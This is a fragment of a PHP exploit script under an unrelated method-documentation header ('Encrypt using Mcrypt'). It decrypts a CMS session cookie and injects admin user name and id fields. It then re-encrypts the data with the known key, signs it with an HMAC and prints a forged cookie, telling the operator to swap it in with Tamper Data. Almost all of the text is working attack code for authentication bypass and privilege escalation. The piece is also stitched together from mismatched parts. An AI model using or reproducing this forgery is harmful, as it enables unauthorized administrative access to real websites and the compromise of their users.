Encrypt using Mcrypt
| public mcrypt_encode ( $data, $key ) : string | ||
| return | string | |
_print("Encryption method is xor!");
$method = 'x';
$plain = $_xor;
} else {
show_error("something went wrong.");
}
}
// Unserialize session string in order to create session array.
$session = unserialize($plain);
_print("Current Session Array :");
print_r($session) . PHP_EOL;
// Add extra fields into it
$session['cms_user_name'] = 'admin';
$session['cms_user_id'] = 1;
// Print out payload string.
_print("Payload appended Session Array :");
print_r($session) . PHP_EOL;
// Serialize it
$session = serialize($session);
// Encrypt it with same key.
if ($method === 'm') {
$payload = base64_encode($encryption->mcrypt_encode($session));
}
if ($method === 'x') {
$payload = base64_encode($encryption->_xor_encode($session));
}
// Calculation of hmac to add it end of the encrypted session string.
$payload .= hash_hmac('sha1', $payload, KEY);
_print("New Cookie");
_print($payload);
_print("Use Tamper Data and change cookie then push F5!");
